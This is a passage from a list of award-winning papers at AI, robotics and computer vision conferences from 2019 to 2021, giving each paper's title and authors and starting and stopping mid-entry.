Hernández, Nicolás Rivera The SoftCumulative Constraint with Quadratic Penalty Yanick Ouellet, Claude-Guy Quimper Best Demonstration: A Demonstration of Compositional, Hierarchical Interactive Task Learning Aaron Mininger, John Laird # NeurIPS 2021 (Online. December 6-14, 2021) Outstanding Paper: A Universal Law of Robustness via Isoperimetry Sébastien Bubeck, Mark Sellke On the Expressivity of Markov Reward David Abel, Will Dabney, Anna Harutyunyan, Mark K. Ho, Michael Littman, Doina Precup, Satinder Singh Deep Reinforcement Learning at the Edge of the Statistical Precipice Rishabh Agarwal, Max Schwarzer, Pablo Samuel Castro, Aaron Courville, Marc G. Bellemare MAUVE: Measuring the Gap Between Neural Text and Human Text using Divergence Frontiers Krishna Pillutla, Swabha Swayamdipta, Rowan Zellers, John Thickstun, Sean Welleck, Yejin Choi, Zaid Harchaoui Continuized Accelerations of Deterministic and Stochastic Gradient Descents, and of Gossip Algorithms Mathieu Even, Raphaël Berthier, Francis Bach, Nicolas Flammarion, Pierre Gaillard, Hadrien Hendrikx, Laurent Massoulié, Adrien Taylor Moser Flow: Divergence-based Generative Modeling on Manifolds Noam Rozen, Aditya Grover, Maximilian Nickel, Yaron Lipman Test of Time: Online Learning for Latent Dirichlet Allocation Matthew Hoffman, David Blei, Francis Bach Datasets & Benchmarks Best Paper: Reduced, Reused and Recycled: The Life of a Dataset in Machine Learning Research Bernard Koch, Emily Denton, Alex Hanna, Jacob Gates Foster ATOM3D: Tasks on Molecules in Three Dimensions Raphael John Lamarre Townshend, Martin Vögele, Patricia Adriana Suriana, Alexander Derry, Alexander Powers, Yianni Laloudakis, Sidhika Balachandar, Bowen Jing, Brandon M. Anderson, Stephan Eismann, Risi Kondor, Russ Altman, Ron O. Dror # 3DV 2021 (Online. December 1-3, 2021) Best Paper: DPFM: Deep Partial Functional Maps Souhaib Attaiki, Gautam Pai, Maks Ovsjanikov Best Student Paper: RAFT-Stereo: Multilevel Recurrent Field Transforms for Stereo Matching Lahav Lipson, Zachary Teed, Jia Deng Best Paper Honorable Mention: Neural Disparity Refinement for Arbitrary Resolution Stereo Filippo Aleotti, Fabio Tosi, Pierluigi Zama Ramirez, Matteo Poggi, Samuele Salti, Stefano Mattoccia, Luigi Di Stefano Best Demo: TANDEM: Tracking and Dense Mapping in Real-time using Deep Multi-view Stereo Lukas Koestler, Nan Yang, Niclas Zeller, Daniel Cremers # CoRL 2021 (London, England. November 16-18, 2021) Best Paper: A System for General In-Hand Object Re-Orientation Tao Chen, Jie Xu, Pulkit Agrawal Best System Paper: FlingBot: The Unreasonable Effectiveness of Dynamic Manipulation for Cloth Unfolding Huy Ha, Shuran Song # EMNLP 2021 (Online. November 7-11, 2021) Best Long Paper: Visually Grounded Reasoning across Languages and Cultures Fangyu Liu, Emanuele Bugliarello, Edoardo Maria Ponti, Siva Reddy, Nigel Collier, Desmond Elliott Best Short Paper: CHoRaL: Collecting Humor Reaction Labels from Millions of Social Media Users Zixiaofan Yang, Shayan Hooshmand, Julia Hirschberg Outstanding Paper: MindCraft: Theory of Mind Modeling for Situated Dialogue in Collaborative Tasks Cristian-Paul Bara, Sky CH-Wang, Joyce Chai SituatedQA: Incorporating Extra-Linguistic Contexts into QA Michael Zhang, Eunsol Choi When Attention Meets Fast Recurrence: Training Language Models with Reduced Compute Tao Lei Shortcutted Commonsense: Data Spuriousness in Deep Learning of Commonsense Reasoning Ruben Branco, Antonio Branco, Joao Antonio Rodrigues, Joao Ricardo Silva Best Demonstration Paper: Datasets: A Community Library for Natural Language Processing Quentin Lhoest, Albert Villanova del Moral, Yacine Jernite, Abhishek Thakur, Patrick von Platen, Suraj Patil, Julien Chaumond, Mariama Drame, Julien Plu, Lewis Tunstall, Joe Davison, Mario Šaško, Gunjan Chhablani, Bhavitvya Malik, Simon Brandeis, Teven Le Scao, Victor Sanh, Canwen Xu, Nicolas Patry, Angelina McMillan-Major, Philipp Schmid, Sylvain Gugger, Clément Delangue, Théo Matussière, Lysandre Debut, Stas Bekman, Pierric Cistac, Thibault Goehringer, Victor Mustar, François Lagunas, Alexander Rush, Thomas Wolf # ICCV 2021 (Online. October 11 - October 17, 2021) Best Paper: Swin Transformer: Hierarchical Vision Transformer using Shifted Windows Ze Liu, Yutong Lin, Yue Cao, Han Hu), Yixuan Wei, Zheng Zhang (MSRA, Stephen Lin, Baining Guo Best Student Paper: Pixel-Perfect Structure-from-Motion with Featuremetric Refinement Philipp Lindenberger, Paul-Edouard Sarlin, Viktor Larsson, Marc Pollefeys # IROS 2021 (Online. September 27 - October 1, 2021) Best Paper: Extended Tactile Perception: Vibration Sensing through Tools and Grasped Objects Tasbolat Taunyazov, Shui Song Luar, Eugene Lim, Hian Hian See, David Lee, Benjamin Tee, Harold Soh Best Student Paper: Dynamic Grasping with a “Soft” Drone: From Theory to Practice Joshua Fishman, Samuel Ubellacker, Nathan Hughes, Luca Carlone Best Application Paper: CCRobot-IV-F A Ducted-Fan-Driven Flying-Type Bridge Stay Cable Climbing Robot Wenchao Zhang, Zhenliang Zheng, Xueqi Fu, Sarsenbek Hazken, Huaping Chen, Min Zhao, Ning Ding Best Cognitive Robotics Paper: Imagination-enabled Robot Perception Patrick Mania, Franklin Kenghagho Kenfack, Michael Neumann, and Michael Beetz Best Mobile Manipulation Paper: Probabilistic Inference in Planning for Partially Observable Long Horizon Problems Alphonsus Adu-Bredu, Nikhil Devraj, Pin-Han Lin, Zhen Zeng, Odest Chadwicke Jenkins Best Robot Mechanism and Design Paper: A Multi-Modal Robotic Gripper with a Reconfigurable Base: Improving Dexterous Manipulation without Compromising Grasping Efficiency Nathan Elangovan, Lucas Gerez, Geng Gao, Minas Liarokapis Best RoboCup Paper: Multi-Resolution POMDP Planning for Multi-Object Search in 3D Kaiyu Zheng, Yoonchang Sung, George Konidaris, Stefanie Tellex Best Entertainment and Amusement Paper: Collaborative Storytelling with Social Robots Eric Nichols, Leo Gao, Yurii Vasylkiv, Randy Gomez Best Safety, Security, and Rescue Robotics Paper: Alternating Drive-and-Glide Flight Navigation of a Kiteplane for Sound Source Position Estimation Makoto Kumon, Hiroshi G. Okuno, Shuichi Tajima Best Agri-Robotics Paper: A Robust Illumination-Invariant Camera System for Agricultural Applications Abhisesh Silwal, Tanvir Parhar, Francisco Yandun, Harjatin Baweja, George Kantor # CASE 2021 (Lyon, France. August 23-27, 2021) Best Paper: Extended Fabrication-Aware Convolution Learning Framework for Predicting 3D Shape Deformation in Additive Manufacturing Yuanxiang Wang, Cesar Ruiz, Qiang Huang Best Student Paper: Designing a User-Centred and Data-Driven Controller for Pushrim-Activated Power-Assisted Wheels: A Case Study Mahsa Khalili, H.F. Machiel Van der Loos, Jaimie Borisoff Best Application Paper: A Seamless Workflow for Design and Fabrication of Multimaterial Pneumatic Soft Actuators Lawrence Smith, Travis Hainsworth, Zachary Jordan, Xavier Bell, Robert MacCurdy Best Healthcare Automation Paper: Hospital Beds Planning and Admission Control Policies for COVID-19 Pandemic: A Hybrid Computer Simulation Approach Yiruo Lu, Yongpei Guan, Xiang Zhong, Jennifer Fishe, Thanh Hogan # ACL 2021 (Online. August 2-5, 2021) Best Paper: Vocabulary Learning via Optimal Transport for Neural Machine Translation Jingjing Xu, Hao Zhou, Chun Gan, Zaixiang Zheng, Lei Li Best Theme Paper: Including Signed Languages in Natural Language Processing Kayo Yin, Amit Moryossef, Julie Hochgesang, Yoav Goldberg, Malihe Alikhani Outstanding Paper: All That’s ‘Human’ Is Not Gold: Evaluating Human Evaluation of Generated Text Elizabeth Clark, Tal August, Sofia Serrano, Nikita Haduong, Suchin Gururangan, Noah A. Smith Intrinsic Dimensionality Explains the Effectiveness of Language Model Fine-Tuning Armen Aghajanyan, Sonal Gupta, Luke Zettlemoyer Mind Your Outliers! Investigating the Negative Impact of Outliers on Active Learning for Visual Question Answering Siddharth Karamcheti, Ranjay Krishna, Li Fei-Fei, Christopher Manning Neural Machine Translation with Monolingual Translation Memory Deng Cai, Yan Wang, Huayang Li, Wai Lam, Lemao Liu Scientific Credibility of Machine Translation Research: A Meta-Evaluation of 769 Papers Benjamin Marie, Atsushi Fujita, Raphael Rubino UnNatural Language Inference Koustuv Sinha, Prasanna Parthasarathi, Joelle Pineau, Adina Williams Humanoids 2020 (Munich, Germany. July 19-21, 2021) Best Oral Paper: Development of Musculoskeletal Legs with Planar Interskeletal Structures to Realize Human Comparable Moving Function Moritaka Onitsuka, Manabu Nishiura, Kento Kawaharazuka, Kei Tsuzuki, Yasunori Toshimitsu, Yusuke Omura, Yuki Asano, Kei Okada, Koji Kawasaki, Masayuki Inaba Best Interactive Paper: Deep Episodic Memory for Verbalization of Robot Experience Leonard Bärmann, Fabian Peller-Konrad, Stefan Constantin, Tamim Asfour, Alex Waibel Mike Stilman Paper: Towards Complex and Continuous Manipulation: A Gesture Based Anthropomorphic Robotic Hand Design Li Tian, Hanhui Li, QiFa Wang, Xuezeng Du, Jialin Tao, Jordan Chong, Nadia Magnenat Thalmann, Jianmin Zheng Most Influential Paper: Capture Point: A Step toward Humanoid Push Recovery Jerry Pratt, John Carff, Sergey Drakunov, Ambarish Goswami # ICML 2021 (Online. July 18-24, 2021) Outstanding Paper: Unbiased Gradient Estimation in Unrolled Computation Graphs with Persistent Evolution Strategies Paul Vicol, Luke Metz, Jascha Sohl-Dickstein Outstanding Paper - Honorable Mention: Optimal Complexity in Decentralized Training Yucheng Lu, Christopher De Sa Oops I Took A Gradient: Scalable Sampling for Discrete Distributions Will Grathwohl, Kevin Swersky, Milad Hashemi, David Duvenaud, Chris Maddison Understanding self-supervised learning dynamics without contrastive pairs Yuandong Tian, Xinlei Chen, Surya Ganguli Solving high-dimensional parabolic PDEs using the tensor train format Lorenz Richter, Leon Sallandt, Nikolas Nüsken Test of Time: Bayesian Learning via Stochastic Gradient Langevin Dynamics Yee Teh, Max Welling # RSS 2021 (Online. July 12-16, 2021) Best Paper: TARE: A Hierarchical Framework for Efficiently Exploring Complex 3D Environments Chao Cao, Hongbiao Zhu, Howie Choset, Ji Zhang Best Student Paper: Learning Riemannian Manifolds for Geodesic Motion Skills Hadi Beik-mohammadi, Soren Hauberg, Georgios Arvanitidis, Gerhard Neumann, Leonel Rozo DiSECt: A Differentiable Simulation Engine for Autonomous Robotic Cutting Eric Heiden, Miles Macklin, Yashraj S. Narang, Dieter Fox, Animesh Garg, Fabio Ramos Best Systems Paper: TARE: A Hierarchical Framework for Efficiently Exploring Complex 3D Environments Chao Cao, Hongbiao Zhu, Howie Choset, Ji Zhang Test of Time: SARSOP: Efficient Point-Based POMDP Planning by Approximating Optimally Reachable Belief Spaces Hanna Kurniawati, David Hsu, Wee Sun Lee # CVPR 2021 (Online. June 19-25, 2021) Best Paper: GIRAFFE: Representing Scenes as Compositional Generative Neural Feature Fields Michael Niemeyer, Andreas Geiger Best Student Paper: Task Programming: Learning Data Efficient Behavior Representations Jennifer J. Sun, Ann Kennedy, Eric Zhan, David J. Anderson, Yisong Yue, Pietro Perona Retrospective Most Impactful Paper from CVPR 2011: Real-time human pose recognition in parts from single depth image Jamie Shotton, Andrew Fitzgibbon, Mat Cook, Toby Sharp, Mark Finocchio, Richard Moore, Alex Kipman, Andrew Blake Baby talk: Understanding and generating simple image descriptions Girish Kulkarni, Visruth Premraj, Sagnik Dhar, Siming Li, Yejin Choi, Alexander C. Berg, Tamara L. Berg # ICRA 2021 (Online. May 30 - June 5, 2021) Best Paper: Extrinsic Contact Sensing with Relative-Motion Tracking from Distributed Tactile Measurements Daolin Ma, Siyuan Dong, Alberto Rodriguez Best Student Paper: Unsupervised Learning of Lidar Features for Use in a Probabilistic Trajectory Estimator David Juny Yoon, Haowei Zhang, Mona Gridseth, Hugues Thomas, Timothy Barfoot Best Automation Paper: Automated Fabrication of the High-Fidelity Cellular Micro-Scaffold through Proportion-Corrective Control of the Photocuring Process Xin Li, Huaping Wang, Qing Shi, Jia Xin Liu, Zhanhua Xin, Xinyi Dong, Qiang Huang, Toshio Fukuda Best Cognitive Robotics Paper: How to Select and Use Tools? : Active Perception of Target Objects Using Multimodal Deep Learning Namiko Saito, Tetsuya Ogata, Satoshi Funabashi, Hiroki Mori, Shigeki Sugano Best Human-Robot Interaction Paper: Reactive Human-To-Robot Handovers of Arbitrary Objects Wei Yang, Chris Paxton, Arsalan Mousavian, Yu-Wei Chao, Maya Cakmak, Dieter Fox Best Mechanism and Design Paper: Soft Hybrid Aerial Vehicle Via Bistable Mechanism Xuan Li, Jessica McWilliams, Minchen Li, Cynthia Sung, Chenfanfu Jiang Best Medical Robotics Paper: Relational Graph Learning on Visual and Kinematics Embeddings for Accurate Gesture Recognition in Robotic Surgery Yonghao Long, Jie Ying Wu, Bo Lu, Yueming Jin, Mathias Unberath, Yunhui Liu, Pheng Ann Heng, Qi Dou Best Multi-Robot Systems Paper: Optimal Sequential Stochastic Deployment of Multiple Passenger Robots Chris (Yu Hsuan) Lee, Graeme Best, Geoffrey Hollinger Best Robot Manipulation Paper: StRETcH: A Soft to Resistive Elastic Tactile Hand Carolyn Matl, Josephine Koe, Ruzena Bajcsy Best Robot Vision Paper: Interval-Based Visual-LiDAR Sensor Fusion Raphael Voges, Bernardo Wagner Best Service Robotics Paper: Compact Flat Fabric Pneumatic Artificial Muscle (ffPAM) for Soft Wearable Robotic Devices Woojong Kim, Hyunkyu Park, Jung Kim Best Unmanned Aerial Vehicles Paper: Aerial Manipulator Pushing a Movable Structure Using a DOB-Based Robust Controller Dongjae Lee, Hoseong Seo, Inkyu Jang, Seung Jae Lee, H. Jin Kim # ICLR 2021 (Online. May 3-7, 2021) Outstanding Paper: Beyond Fully-Connected Layers with Quaternions: Parameterization of Hypercomplex Multiplications with 1/n Parameters Aston Zhang, Yi Tay, Shuai Zhang, Alvin Chan, Anh Tuan Luu, Siu Hui, Jie Fu Complex Query Answering with Neural Link Predictors Erik Arakelyan, Daniel Daza, Pasquale Minervini, Michael Cochez EigenGame: PCA as a Nash Equilibrium Ian Gemp, Brian McWilliams, Claire Vernade, Thore Graepel Learning Mesh-Based Simulation with Graph Networks Tobias Pfaff, Meire Fortunato, Alvaro Sanchez-Gonzalez, Peter Battaglia Neural Synthesis of Binaural Speech from Mono Audio Alexander Richard, Dejan Markovic, Israel D. Gebru, Steven Krenn, Gladstone Alexander Butler, Fernando Torre, Yaser Sheikh Optimal Rates for Averaged Stochastic Gradient Descent under Neural Tangent Kernel Regime Atsushi Nitanda, Taiji Suzuki Rethinking Architecture Selection in Differentiable NAS Ruochen Wang, Minhao Cheng, Xiangning Chen, Xiaocheng Tang, Cho-Jui Hsieh Score-Based Generative Modeling through Stochastic Differential Equations Yang Song, Jascha Sohl-Dickstein, Diederik P Kingma, Abhishek Kumar, Stefano Ermon, Ben Poole # AAAI 2021 (Online. February 2-9, 2021) Outstanding Paper: Informer: Beyond Efficient Transformer for Long Sequence Time-Series Forecasting Haoyi Zhou, Shanghang Zhang, Jieqi Peng, Shuai Zhang, Jianxin Li, Hui Xiong, Wancai Zhang Exploration-Exploitation in Multi-Agent Learning: Catastrophe Theory Meets Game Theory Stefanos Leonardos, Georgios Piliouras Outstanding Paper: Special Track on AI for Social Impact: Mitigating Political Bias in Language Models through Reinforced Calibration Ruibo Liu, Chenyan Jia, Jason W Wei, Guangxuan Xu, Lili Wang, Soroush Vosoughi Distinguished Paper: IQ – Incremental Learning for Solving QSAT Thomas L Lee, Viktor Tóth, Sean B Holden Ethically Compliant Sequential Decision Making Justin Svegliato, Samer Nashed, Shlomo Zilberstein On the Tractability of SHAP Explanations Guy Van den Broeck, Anton Lykov, Maximilian Schleich, Dan Suciu Expected Eligibility Traces Hado van Hasselt, Sephora Madjiheurem, Matteo Hessel, Andre Barreto, David Silver, Diana Borsa Polynomial-Time Algorithms for Counting and Sampling Markov Equivalent DAGs Marcel Wienöbst, Max Bannach, Maciej Liskiewicz Self-Supervised Multi-View Stereo via Effective Co-Segmentation and Data-Augmentation Hongbin Xu, Zhipeng Zhou, Yu Qiao, Wenxiong Kang, Qiuxia Wu Best 3-Minute Presentation: Are Chess Discussions Racist? An Adversarial Hate Speech Data Set Rupak Sarkar, Ashiqur R. Khudabukhs Best Demonstration: TAILOR: Teaching with Active and Incremental Learning for Object Registration Qianli Xu, Nicolas Gauthier, Wenyu Liang, Fen Fang, Hui Li Tan, Ying Sun, Yan Wu, Liyuan Li, Joo-Hwee Lim # NeurIPS 2020 (Online. December 6-12, 2020) Best Paper: No-Regret Learning Dynamics for Extensive-Form Correlated Equilibrium Andrea Celli, Alberto Marchesi, Gabriele Farina, Nicola Gatti Improved Guarantees and a Multiple-Descent Curve for Column Subset Selection and the Nyström Method Michal Derezinski, Rajiv Khanna, Michael W. Mahoney Language Models are Few-Shot Learners Tom B. Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel M. Ziegler, Jeffrey Wu, Clemens Winter, Christopher Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, Dario Amodei Test of Time: HOGWILD!: A Lock-Free Approach to Parallelizing Stochastic Gradient Descent Feng Niu, Benjamin Recht, Christopher Re, Stephen Wright # 3DV 2020 (Online. November 25-28, 2020) Best Paper: Grasping Field: Learning Implicit Representations for Human Grasps Korrawe Karunratanakul, Jinlong Yang, Yan Zhang, Michael Black, Krikamol Muandet, Siyu Tang # EMNLP 2020 (Online. November 16-20, 2020) Best Paper: Digital voicing of Silent Speech David Gaddy, Dan Klein Best Demonstration Paper: Transformers: State-of-the-art Natural Language Processing Thomas Wolf, Lysandre Debut, Victor Sanh, Julien Chaumond, Clement Delangue, Anthony Moi, Pierric Cistac, Tim Rault, Rémi Louf, Morgan Funtowicz, Joe Davison, Sam Shleifer, Patrick von Platen, Clara Ma, Yacine Jernite, Julien Plu, Canwen Xu, Teven Le Scao, Sylvain Gugger, Mariama Drame, Quentin Lhoest, Alexander M. Rush # CoRL 2020 (Online. November 16-18, 2020) Best Paper: Learning Latent Representations to Influence Multi-Agent Interaction Annie Xie, Dylan Losey, Ryan Tolsma, Chelsea Finn, Dorsa Sadigh Best System Paper: SMARTS: An Open-Source Scalable Multi-Agent RL Training School for Autonomous Driving Ming Zhou, Jun Luo, Julian Villella, Yaodong Yang, David Rusu, Jiayu Miao, Weinan Zhang, Montgomery Alban, Iman Fadakar, Zheng Chen, Chongxi Huang, Ying Wen, Kimia Hassanzadeh, Daniel Graves, Zhengbang Zhu, Yihan Ni, Nhat Nguyen, Mohamed Elsayed, Haitham Ammar, Alexander Cowen-Rivers, Sanjeevan Ahilan, Zheng Tian, Daniel Palenicek, Kasra Rezaee, Peyman Yadmellat, Kun Shao, Dong Chen, Baokuan Zhang, Hongbo Zhang, Jianye Hao, Wulong Liu, Jun Wang Best Presentation: Accelerating Reinforcement Learning with Learned Skill Priors Karl Pertsch, Youngwoon Lee, Joseph Lim # IROS 2020 (Online. October 25 - January 24, 2020) Best Paper: SwingBot: Learning Physical Features from In-Hand Tactile Exploration for Dynamic Swing-Up Manipulation Chen Wang, Shaoxiong Wang, Branden Romero, Veiga Filipe Fernandes Veiga, Edward Adelson Best Student Paper: Computational Design of Balanced Open Link Planar Mechanisms with Counterweights from User Sketches Takuto Takahashi, Hiroshi G. Okuno, Shigeki Sugano, Stelian Coros, Bernhard Thomaszewski Best Application Paper: MHYRO: Modular HYbrid RObot for Contact Inspection and Maintenance in Oil & Gas Plants Abraham López, Pedro J. Sanchez-Cuevas, Alejandro Suarez, Ámbar Soldado, Anibal Ollero Best Cognitive Robotics Paper: Representation and Experience-Based Learning of Explainable Models for Robot Action Execution Alex Mitrevski, Paul G. Plöger, Gerhard Lakemeyer Best Robot Mechanism and Design Paper: FreeBOT: A Freeform Modular Self-Reconfigurable Robot with Arbitrary Connection Point - Design and Implementation Guanqi Liang, Haobo Luo, Ming Li, Huihuan Qian, Tin Lun Lam Best RoboCup Paper: Real-Time Constrained Nonlinear Model Predictive Control on SO(3) for Dynamic Legged Locomotion Seungwoo Hong, Joon-Ha Kim, Hae-Won Park Best Entertainment and Amusement Paper: Towards Micro Robot Hydrobatics: Vision-based Guidance, Navigation, and Control for Agile Underwater Vehicles in Confined Environments Daniel Andre Duecker, Nathalie Bauschmann, Tim Hansen, Edwin Kreuzer, Robert Seifried Best Safety, Security, and Rescue Robotics Paper: Autonomous Spot: Long-Range Autonomous Exploration of Extreme Environments with Legged Locomotion Amanda Bouman, Muhammad Fadhil Ginting, Nikhilesh Alatur, Matteo Palieri, David D. Fan # ECCV 2020 (Online. August 23-28, 2020) Best Paper: RAFT: Recurrent All-Pairs Field Transforms for Optical Flow Zachary Teed, Jia Deng # CASE 2020 (Online. August 20-21, 2020) Best Paper: Long-Short Term Spatiotemporal Tensor Prediction for Passenger Flow Profile Ziyue Li, Hao Yan, Chen Zhang, Fugee Tsung Best Student Paper: Simulating Polyculture Farming to Tune Automation Policies for Plant Diversity and Precision Irrigation Yahav Avigal, Jensen Gao, William Wong, Kevin Li, Grady Pierroz, Fang Shuo Deng, Mark Theis, Mark Presten, Ken Goldberg Large-Workspace and High-Resolution Magnetic Microrobot Navigation Using Global-Local Path Planning and Eye-In-Hand Visual Servoing Lidong Yang, Li Zhang Best Application Paper: A System for Human-In-The-Loop Simulation of Industrial Collaborative Robot Applications Maximilian Metzner, Daniel Utsch, Walter Matthias, Christian Hofstetter, Christina Ramer, Andreas Blank, Jörg Franke # ICML 2020 (Online. July 13-18, 2020) Outstanding Paper: On Learning Sets of Symmetric Elements Haggai Maron, Or Litany, Gal Chechik, Ethan Fetaya Tuning-free Plug-and-Play Proximal Algorithm for Inverse Imaging Problems Kaixuan Wei, Angelica I Aviles-Rivero, Jingwei Liang, Ying Fu, Carola-Bibiane Schönlieb, Hua Huang Test of Time: Gaussian Process Optimization in the Bandit Setting: No Regret and Experimental Design Niranjan Srinivas, Andreas Krause, Sham Kakade, Matthias Seeger # RSS 2020 (Online. July 12-16, 2020) Best Paper: Learning Agile Robotic Locomotion Skills by Imitating Animals Xue Bin Peng, Erwin Coumans, Tingnan Zhang, Tsang-Wei Lee, Jie Tan, Sergey Levine Best Student Paper: A Continuous Representation of Belief over SO(3) for Robust Rotation Learning with Uncertainty Valentin Peretroukhin, Matthew Giamou, David M. Rosen, W. Nicholas Greene, Nicholas Roy, Jonathan Kelly Best Systems Paper: AlphaPilot: Autonomous Drone Racing Philipp Foehn, Dario Brescianini, Elia Kaufmann, Titus Cieslewski, Mathias Gehrig, Manasi Muglikar, Davide Scaramuzza Test of Time: Square Root SAM: Simultaneous localization and mapping via square root information smoothing Frank Dellaert, Michael Kaess # ACL 2020 (Online. July 5-10, 2020) Best Paper: Beyond Accuracy: Behavioral Testing of NLP Models with CheckList Marco Tulio Ribeiro, Tongshuang Wu, Carlos Guestrin, Sameer Singh Best Theme Paper: Climbing towards NLU: On Meaning, Form, and Understanding in the Age of Data Emily M. Bender, Alexander Koller Best Demonstration Paper: GAIA: A Fine-grained Multimedia Knowledge Extraction System Manling Li, Alireza Zareian, Ying Lin, Xiaoman Pan, Spencer Whitehead, Brian Chen, Bo Wu, Heng Ji, Shih-Fu Chang, Clare Voss, Daniel Napierski, Marjorie Freedman # CVPR 2020 (Online. June 16-18, 2020) Best Paper: Unsupervised Learning of Probably Symmetric Deformable 3D Objects from Images in the Wild Shangzhe Wu, Christian Rupprecht, Andrea Vedaldi Best Student Paper: BSP-Net: Generating Compact Meshes via Binary Space Partitioning Zhiqin Chen, Andrea Tagliasacchi, Hao Zhang # ICRA 2020 (Online. May 31 - August 31, 2020) Best Paper: Preference-Based Learning for Exoskeleton Gait Optimization Maegan Tucker, Ellen Novoseller, Claudia Kann, Yanan Sui, Yisong Yue, Joel Burdick, Aaron Ames Best Student Paper: Design of a Roller-Based Dexterous Hand for Object Grasping and Within-Hand Manipulation Shenli Yuan, Austin Epps, Jerome Nowak, Kenneth Salisbury Best Automation Paper: Securing Industrial Operators with Collaborative Robots: Simulation and Experimental Validation for a Carpentry Task Nassim Benhabib, Vincent Padois, David Daney Best Cognitive Robotics Paper: Semantic Linking Maps for Active Visual Object Search Zhen Zeng, Adrian Röfer, Odest Chadwicke Jenkins Best Human-Robot Interaction Paper: Preference-Based Learning for Exoskeleton Gait Optimization Maegan Tucker, Ellen Novoseller, Claudia Kann, Yanan Sui, Yisong Yue, Joel Burdick, Aaron Ames Best Medical Robotics Paper: Fault Tolerant Control in Shape-Changing Internal Robots Lavanya Balasubramanian, Tom Wray, Dana Damian Best Multi-Robot Systems Paper: Distributed Multi-Target Tracking for Autonomous Vehicle Fleets Ola Shorinwa, Javier Yu, Trevor Halsted, Alex Koufos, Mac Schwager Best Robot Manipulation Paper: Design of a Roller-Based Dexterous Hand for Object Grasping and Within-Hand Manipulation Shenli Yuan, Austin Epps, Jerome Nowak, Kenneth Salisbury Best Robot Vision Paper: Graduated Non-Convexity for Robust Spatial Perception: From Non-Minimal Solvers to Global Outlier Rejection Heng Yang, Pasquale Antonante, Vasileios Tzoumas, Luca Carlone Best Service Robotics Paper: Active Reward Learning for Co-Robotic Vision Based Exploration in Bandwidth Limited Environments Stewart Jamieson, Jonathan Patrick How, Yogesh Girdhar Best Unmanned Aerial Vehicles Paper: Design and Autonomous Stabilization of a Ballistically Launched Multirotor Amanda Bouman, Paul Nadan, Matthew Anderson, Daniel Pastor, Jacob Izraelevitz, Joel Burdick, Brett Kennedy # AAAI 2020 (New York, USA. February 7-12, 2020) Outstanding Paper: WinoGrande: An Adversarial Winograd Schema Challenge at Scale Keisuke Sakaguchi, Ronan Le Bras, Chandra Bhagavatula, Yejin Choi Outstanding Student Paper: Fair Division of Mixed Divisible and Indivisible Goods Xiaohui Bei, Zihao Li, Jinyan Liu, Shengxin Liu, Xinhang Lu Outstanding Paper: Special Track on AI for Social Impact: A Distributed Multi-Sensor Machine Learning Approach to Earthquake Early Warning Kevin Fauvel, Daniel Balouek-Thomert, Diego Melgar, Pedro Silva, Anthony Simonet, Gabriel Antoniu, Alexandru Costan, Véronique Masson, Manish Parashar, Ivan Rodero, Alexandre Termier # NeurIPS 2019 (Vancouver, Canada. December 8-14, 2019) Outstanding Paper: Distribution-Independent PAC Learning of Halfspaces with Massart Noise Ilias Diakonikolas, Themis Gouleakis, Christos Tzamos Outstanding New Directions Paper: Uniform convergence may be unable to explain generalization in deep learning Vaishnavh Nagarajan, J. Zico Kolter Test of Time: Dual Averaging Method for Regularized Stochastic Learning and Online Optimization Lin Xiao # IROS 2019 (Macau, China. November 4-8, 2019) Best Paper: Planning Reactive Manipulation in Dynamic Environments Philipp Sebastian Schmitt, Florian Wirnshofer, Kai M. Wurm, Georg v. Wichert, Wolfram Burgard Best Student Paper: Efficient and Guaranteed Planar Pose Graph Optimization Using the Complex Number Representation Taosha Fan, Hanlin Wang, Michael Rubenstein, Todd Murphey Best Application Paper: Visual Servoing of Miniature Magnetic Film Swimming Robots for 3D Arbitrary Path Following Chenyang Huang, Tiantian Xu, Jia Liu, Laliphat Manamanchaiyaporn, Xinyu Wu Best Cognitive Robotics Paper: Planning Beyond The Sensing Horizon Using a Learned Context Michael Everett, Justin Miller, Jonathan Patrick How Best RoboCup Paper: Motion Decoupling and Composition via Reduced Order Model Optimization for Dynamic Humanoid Walking with CLF-QP based Active Force Control Xiaobin Xiong, Aaron Ames Best Novel Technology Paper for Amusement Culture: Responsive Joint Attention in Human-Robot Interaction André Pereira, Catharine Oertel, Leonor Fermoselle, Joe Mendelson, Joakim Gustafson Best Safety, Security, and Rescue Robotics Paper: Optimization Based Motion Planning for Multi-Limbed Vertical Climbing Robots Xuan Lin, Jingwen Zhang, Junjie Shen, Gabriel Ikaika Fernandez, Dennis Hong # EMNLP 2019 (Hong Kong, China. November 3-7, 2019) Best Paper: Specializing Word Embeddings (for Parsing) by Information Bottleneck Xiang Lisa Li, Jason Eisner Best Resource Paper: Two New Evaluation Datasets for Low-Resource Machine Translation: Nepali-English and Sinhala English Francisco Guzmán, Peng-Jen Chen, Myle Ott, Juan Pino, Guillaume Lample, Philipp Koehn, Vishrav Chaudhary, Marc’Aurelio Ranzato Best Demo Paper: AllenNLP Interpret: A Framework for Explaining Predictions of NLP Models Eric Wallace, Jens Tuyls, Junlin Wang, Sanjay Subramanian, Matt Gardner, Sameer Singh # CoRL 2019 (Osaka, Japan. October 30 - November 1, 2019) Best Paper: A Divergence Minimization Perspective on Imitation Learning Methods Seyed Kamyar Seyed Ghasemipour, Richard Semel, Shixiang Gu Best System Paper: Learning to Manipulate Object Collections Using Grounded State Representations Matthew Wilson, Tucker Hermans Best Presentation: Bayesian Optimization Meets Riemannian Manifolds in Robot Learning Noemie Jaquier, Leonel Rozo, Sylvain Calinon, Mathias Burger # ICCV 2019 (Seoul, Korea. October 27 - November 2, 2019) Best Paper: SinGAN: Learning a Generative Model from a Single Natural Image Tamar Rott Shaham, Tali Dekel, Tomer Michaeli Best Student Paper: PLMP - Point-Line Minimal Problems in Complete Multi-View Visibility Timothy Duff, Kathlén Kohn, Anton Leykin, Tomas Pajdla Humanoids 2019 (Toronto, Canada. October 15-17, 2019) Best Oral Paper: Footstep Planning for Autonomous Walking Over Rough Terrain Robert J. Griffin, Georg Wiedebach, Stephen McCrory, Sylvain Bertrand, Inho Lee, Jerry Pratt Best Interactive Paper: Formal Connections between Template and Anchor Models via Approximate Simulation Vince Kurtz, Rafael Rodrigues da Silva, Patrick M. Wensing, Hai Lin Mike Stilman Paper: A Robot Design Method for Weight Saving Aimed at 